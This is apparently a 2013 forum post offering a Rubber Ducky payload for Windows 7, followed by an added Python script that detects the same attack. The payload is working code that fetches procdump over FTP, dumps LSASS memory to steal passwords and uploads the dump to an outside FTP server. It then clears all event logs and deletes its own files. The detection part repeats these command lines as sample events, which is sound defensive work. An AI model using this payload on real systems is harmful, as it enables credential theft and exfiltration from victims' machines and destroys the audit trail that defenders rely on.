waddell Posted August 26, 2013 (edited)

I'm sure this can be more discreet, and possibly faster, but this was the simplest way to get what I wanted done. Once you have the dmp file, just use mimikatz to find the passwords.

Note: Some of this needs to be edited for your FTP server's information (pay attention). You may need to modify this for UAC.

Thanks to:
https://forums.hak5.org/index.php?/topic/29800-payload-duck-slurp-payload/
https://forums.hak5.org/index.php?/topic/30103-payload-exfiltration-via-wifi/
http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

REM Payload: FTP LSASS dump for password stealing
REM Target: Windows 7
REM Author: Matt Waddell
REM Some information taken from other payloads on the forums, but this is a nice working utility for dumping passwords to an FTP server
REM Copies files to the target machine and executes them hidden in the background so you are very quick with the attack
REM There are probably many better ways to do what I am doing, but as a sys admin this is what I needed to prove a point
REM procdump must open lsass.exe with full access, so the cmd window this opens has to be elevated (see the UAC note above)
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /F:OFF /V:ON /K
DELAY 500
ENTER
REM *** Some Quick Clean Up (Just In Case) ***
REM Will remove any existing files to make the scripts work quicker and better
STRING if not exist C:\Temp md C:\Temp
ENTER
STRING erase /Q C:\Temp\procdump.exe
ENTER
STRING erase /Q C:\Temp\*.dmp
ENTER
STRING erase /Q C:\Temp\*.txt
ENTER
STRING erase /Q C:\Temp\*.bat
ENTER
STRING erase /Q C:\Temp\*.ftp
ENTER
STRING erase /Q C:\Temp\*.vbs
ENTER
STRING CD C:\Temp
ENTER
REM *** ftp_down.ftp ***
REM Your download settings for grabbing procdump off your FTP server (minimizes the need for a local storage device) (modify as needed)
REM ftp.exe defaults to ASCII transfers; switch to binary before fetching an .exe or the download is corrupted
STRING copy con ftp_down.ftp
ENTER
STRING USER ***********
ENTER
STRING *******PASS*********
ENTER
STRING binary
ENTER
STRING get procdump.exe C:\Temp\procdump.exe
ENTER
STRING bye
ENTER
CONTROL Z
ENTER
REM *** ftp_up.ftp ***
REM Your upload settings for putting the lsass dump and some system information on your FTP server (modify as needed)
REM put does not expand wildcards; prompt turns off per-file confirmation so mput can send *.dmp and *.txt unattended
STRING copy con ftp_up.ftp
ENTER
STRING USER ***********
ENTER
STRING *******PASS*********
ENTER
STRING binary
ENTER
STRING prompt
ENTER
STRING lcd C:\Temp
ENTER
STRING mput *.dmp
ENTER
STRING mput *.txt
ENTER
STRING bye
ENTER
CONTROL Z
ENTER
REM *** ftp_lsass.bat ***
REM Runs in the background, downloads procdump, dumps lsass, uploads the dump and system info, deletes all files, clears logs
STRING copy con ftp_lsass.bat
ENTER
STRING ftp -n -s:C:\Temp\ftp_down.ftp **********server*************
ENTER
STRING procdump.exe -accepteula -ma lsass.exe C:\Temp\%COMPUTERNAME%_lsass.dmp
ENTER
STRING systeminfo > C:\Temp\%COMPUTERNAME%_system.txt
ENTER
STRING ftp -n -s:C:\Temp\ftp_up.ftp **********server*************
ENTER
STRING erase /Q C:\Temp\procdump.exe
ENTER
STRING erase /Q C:\Temp\*.dmp
ENTER
STRING erase /Q C:\Temp\*.txt
ENTER
STRING erase /Q C:\Temp\*.ftp
ENTER
STRING erase /Q C:\Temp\*.vbs
ENTER
REM Inside a batch file the for variable has to be written %%x, not %x, or the loop errors out
STRING for /f %%x in ('wevtutil el') do wevtutil cl "%%x"
ENTER
STRING del %0
ENTER
STRING exit
ENTER
CONTROL Z
ENTER
REM *** VBS File for Running Invisibly ***
STRING copy con C:\Temp\invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM *** Run Primary Payload and Close Rubber Ducky Cmd Window (can remove ducky when it is closed, everything else is in background) ***
STRING wscript.exe C:\Temp\invis.vbs C:\Temp\ftp_lsass.bat && exit
ENTER

Edited August 26, 2013 by waddell
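The traces this payload leaves on the host, from the defender's side, as an added detection example that is not part of waddell's post or any vendor's rule set. It assumes Sysmon-style ProcessCreate (EventID 1) and ProcessAccess (EventID 10) records and the Windows log-cleared events (Security 1102, System 104); the sample records, host name, FTP server address and field layout are constructed for the example.

```python
import re

# Sysmon ProcessAccess "GrantedAccess" bits a memory dump of lsass needs:
# PROCESS_VM_READ | PROCESS_QUERY_INFORMATION. 0x1FFFFF is PROCESS_ALL_ACCESS.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
DUMP_ACCESS = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Command-line patterns for the three steps the payload's batch file performs.
LSASS_DUMP_CMD = re.compile(r"-ma\s+lsass(\.exe)?\b", re.IGNORECASE)      # procdump -ma lsass.exe
FTP_SCRIPT_CMD = re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.IGNORECASE)     # ftp -n -s:script host
WEVTUTIL_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.IGNORECASE)  # wevtutil cl <log>

# Constructed sample records (field names follow Sysmon EventData; the values
# are assumptions, not real telemetry). Two of them are benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Temp\procdump.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"procdump.exe -accepteula -ma lsass.exe C:\Temp\WS01_lsass.dmp"},
    {"EventID": 10, "SourceImage": r"C:\Temp\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Windows\System32\ftp.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"ftp -n -s:C:\Temp\ftp_up.ftp 203.0.113.10"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wevtutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wevtutil cl "Security"'},
    {"EventID": 1102, "Channel": "Security", "SubjectUserName": "jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]


def _basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule names one event trips (empty list when nothing matches)."""
    hits = []
    eid = event.get("EventID")
    if eid == 10 and _basename(event.get("TargetImage", "")) == "lsass.exe":
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        # Only flag handles that can actually read lsass memory; plenty of benign
        # processes open lsass with PROCESS_QUERY_LIMITED_INFORMATION (0x1000).
        if granted & DUMP_ACCESS == DUMP_ACCESS:
            hits.append("lsass_memory_read")
    elif eid == 1:
        cmd = event.get("CommandLine", "")
        if LSASS_DUMP_CMD.search(cmd):
            hits.append("procdump_lsass")
        if _basename(event.get("Image", "")) == "ftp.exe" and FTP_SCRIPT_CMD.search(cmd):
            hits.append("scripted_ftp")
        if WEVTUTIL_CLEAR.search(cmd):
            hits.append("wevtutil_clear")
    elif eid in (1102, 104):
        # Written after the log is emptied, so it outlives the payload's wevtutil cl loop.
        hits.append("eventlog_cleared")
    return hits


def scan(events):
    """Group events by the rule they trip; add a chain finding when the dump,
    exfil and anti-forensics steps all appear in the same batch of events."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, []).append(ev)
    chain = ("procdump_lsass", "scripted_ftp", "eventlog_cleared")
    if all(rule in findings for rule in chain):
        findings["ftp_lsass_chain"] = [ev for rule in chain for ev in findings[rule]]
    return findings


if __name__ == "__main__":
    for rule, evs in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: {len(evs)} event(s)")
```

The process-access rule keys on the access mask rather than the tool name, so renaming procdump.exe does not help the attacker; the log-cleared rule matters because the payload's `for /f` loop empties every log, yet the clearing itself is recorded afterwards (1102 in Security, 104 in System for the others), so that event is the artifact that survives.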